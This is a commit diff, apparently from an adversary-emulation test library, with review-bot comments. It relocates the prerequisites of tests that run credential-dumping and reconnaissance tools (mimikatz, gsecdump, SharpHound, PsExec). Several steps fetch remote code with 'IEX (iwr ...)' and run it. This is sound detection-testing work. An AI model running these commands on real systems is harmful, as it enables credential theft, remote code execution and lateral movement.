use ExternalPayloads folder (#2462)
* use ExternalPayloads folder * psexec as external dependency * psexec as external dependency
@@ -19,7 +19,7 @@ atomic_tests:
|
||||
gsecdump_exe:
|
||||
description: Path to the Gsecdump executable
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
|
||||
gsecdump_bin_hash:
|
||||
description: File hash of the Gsecdump binary file
|
||||
type: string
|
||||
|
||||
@@ -66,7 +66,7 @@ atomic_tests:
|
||||
SharpView:
|
||||
description: Path of the executable opensource redteam tool used for the performing this atomic.
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1049\bin\SharpView.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe
|
||||
syntax:
|
||||
description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
|
||||
type: string
|
||||
|
||||
@@ -25,23 +25,18 @@ atomic_tests:
|
||||
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: File path for SharpHound payload
|
||||
type: string
|
||||
default: PathToAtomicsFolder\T1059.001\src
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
SharpHound.ps1 must be located at #{file_path}
|
||||
SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
|
||||
prereq_command: |
|
||||
if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
|
||||
executor:
|
||||
command: |
|
||||
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
|
||||
import-module #{file_path}\SharpHound.ps1
|
||||
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
|
||||
Invoke-BloodHound -OutputDirectory $env:Temp
|
||||
Start-Sleep 5
|
||||
cleanup_command: |
|
||||
|
||||
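Review bot: The `file_path` input argument (default `PathToAtomicsFolder\T1059.001\src`) is kept, but none of the new prereq_command, get_prereq_command or import-module lines reads it any more, and the unchanged `write-host "Import and Execution of SharpHound.ps1 from #{file_path}"` now reports a location the script is not loaded from. Either drop the argument or keep using it with the new location, e.g. `default: PathToAtomicsFolder\..\ExternalPayloads` together with `import-module "#{file_path}\SharpHound.ps1"`, so the executor and its message agree. The downloaded SharpHound.ps1 is pinned to a commit but not otherwise integrity-checked before import-module; a hash comparison in prereq_command would match what the gsecdump test appears to intend with its `gsecdump_bin_hash` argument (whether that hash is actually checked is not visible here). The hunk ends inside cleanup_command, whose body is outside it.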
@@ -593,6 +593,7 @@ atomic_tests:
|
||||
prereq_command: |
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
|
||||
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
|
||||
executor:
|
||||
@@ -774,13 +775,9 @@ atomic_tests:
|
||||
description: Destination path to file
|
||||
type: path
|
||||
default: $env:TEMP\Atomic-license.txt
|
||||
local_nimgrab:
|
||||
description: Local path to nimgrab
|
||||
type: path
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe
|
||||
executor:
|
||||
command: |
|
||||
cmd /c nimgrab.exe #{remote_file} #{destination_path}
|
||||
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
|
||||
cleanup_command: |
|
||||
del #{destination_path} >nul 2>&1
|
||||
name: command_prompt
|
||||
@@ -789,13 +786,12 @@ atomic_tests:
|
||||
- description: |
|
||||
NimGrab must be installed on system.
|
||||
prereq_command: |
|
||||
if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip
|
||||
Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force
|
||||
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
|
||||
Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim
|
||||
Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip
|
||||
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
|
||||
- name: iwr or Invoke Web-Request download
|
||||
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
|
||||
description: |
|
||||
|
||||
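Review bot: The new `Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"` replaces the `#{local_nimgrab}` copy, but the two `Remove-Item` lines for `nim` and `nim.zip` appear to sit on the removed side (the hunk shrinks from 13 to 12 lines), so the extracted Nim distribution and the archive would remain in ExternalPayloads after the prerequisite is satisfied. If that is intended, state it in the dependency description; otherwise re-add `Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\nim" -Recurse -Force` and `Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -Force` after the copy. The `-Outfile`, `Expand-Archive` and Copy-Item source paths in the same block are unquoted while the new destination is quoted; quoting them consistently protects against a PathToAtomicsFolder value containing spaces. The dependencies list this entry belongs to starts above the hunk.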
@@ -154,7 +154,7 @@ atomic_tests:
|
||||
renamed_binary:
|
||||
description: renamed Microsoft.Workflow.Compiler
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1218\src\svchost.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
|
||||
mwcpath:
|
||||
description: Default location of Microsoft.Workflow.Compiler.exe
|
||||
type: path
|
||||
@@ -168,10 +168,10 @@ atomic_tests:
|
||||
- description: |
|
||||
.Net must be installed for this test to work correctly.
|
||||
prereq_command: |
|
||||
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
|
||||
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
write-host "you need to rename workflow complier before you run this test"
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
|
||||
executor:
|
||||
command: |
|
||||
#{renamed_binary} #{xml_payload} output.txt
|
||||
|
||||
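Review bot: In the new get_prereq_command the source operand of `Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force` is unquoted while the destination is quoted; if `mwcpath` resolves to a directory containing a space the copy fails, so write it `Copy-Item "#{mwcpath}\#{mwcname}" "#{renamed_binary}" -Force`. Moving the copy out of prereq_command, which now only tests `#{renamed_binary}`, is the right split, and the removed `write-host` hint about renaming manually no longer applies. The hunk ends inside the executor command block.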
@@ -22,7 +22,7 @@ atomic_tests:
|
||||
msxsl_exe:
|
||||
description: Location of the MSXSL executable.
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1220\bin\msxsl.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
@@ -44,6 +44,7 @@ atomic_tests:
|
||||
prereq_command: |
|
||||
if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
|
||||
executor:
|
||||
command: |
|
||||
@@ -72,7 +73,7 @@ atomic_tests:
|
||||
msxsl_exe:
|
||||
description: Location of the MSXSL executable.
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1220\bin\msxsl.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
@@ -290,7 +290,7 @@ atomic_tests:
|
||||
mimikatz_exe:
|
||||
description: Path of the Mimikatz binary
|
||||
type: string
|
||||
default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
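Review bot: `mimikatz_exe` is declared `type: string` while the other executable-path arguments touched by this commit (`gsecdump_exe`, `SharpView`, `msxsl_exe`) use `type: path`; its new default `PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe` is a filesystem path, so change it to `type: path` for consistency. The `x64` subdirectory differs from the flat layout the other new defaults use; confirm that the dependency that fetches the binary (below the hunk) extracts into that subfolder.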
@@ -38,7 +38,7 @@ atomic_tests:
|
||||
gpp_script_path:
|
||||
description: Path to the Get-GPPPassword PowerShell Script
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\Get-GPPPassword.ps1
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
+15
-15
@@ -15,15 +15,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 1
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike Lateral Movement (psexec_psh) pipe
|
||||
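Review bot: `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)` fetches the helper from the moving `master` ref and executes it immediately, so whatever that branch holds at run time is what runs on the host; the SharpHound dependency in this same commit pins its download to a commit hash, and the same should be done here. The identical block is repeated in the hunks at `@@ -39`, `@@ -63`, `@@ -87` and `@@ -111`, so fix all five or move the URL into one input argument. The new `Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"` is presumed to preserve the zip's `build\` subfolder, since prereq_command tests `...\ExternalPayloads\build\namedpipes_executor.exe`; worth confirming. The test entry this dependency belongs to starts above the hunk.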
@@ -39,15 +39,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 2
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike SSH (postex_ssh) pipe
|
||||
@@ -63,15 +63,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 3
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike post-exploitation pipe (4.2 and later)
|
||||
@@ -87,15 +87,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 4
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike post-exploitation pipe (before 4.2)
|
||||
@@ -111,13 +111,13 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 5
|
||||
name: command_prompt
|
||||
|
||||
@@ -119,13 +119,23 @@ atomic_tests:
|
||||
description: Target hostname to attempt psexec connection to for emulation of lateral movement.
|
||||
type: string
|
||||
default: $ENV:COMPUTERNAME
|
||||
dependencies:
|
||||
- description: |
|
||||
PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
|
||||
prereq_command: |
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
|
||||
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
|
||||
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null
|
||||
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
|
||||
executor:
|
||||
command: |
|
||||
cmd.exe /c "wmic csproduct get UUID"
|
||||
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
|
||||
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
|
||||
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
|
||||
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
|
||||
copy "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" $env:temp
|
||||
cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""
|
||||
cleanup_command: |
|
||||
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f
|
||||
|
||||
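Review bot: In the new get_prereq_command the download `Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"` runs before any directory exists, and the `New-Item -ItemType Directory (Split-Path ...)` that follows only helps the later Copy-Item, so on a host without an ExternalPayloads folder `-OutFile` fails first. Put directory creation first as the other hunks in this commit do, `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null`, after which the Split-Path line is redundant. Unlike the other dependency blocks in this commit no `dependency_executor_name: powershell` is added; unless the test's executor (its `name:` is below the hunk) is powershell, these cmdlets will not run. The `Expand-Archive` and Copy-Item source paths are unquoted while the neighbouring arguments are quoted; quote them for consistency.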
Binary file not shown.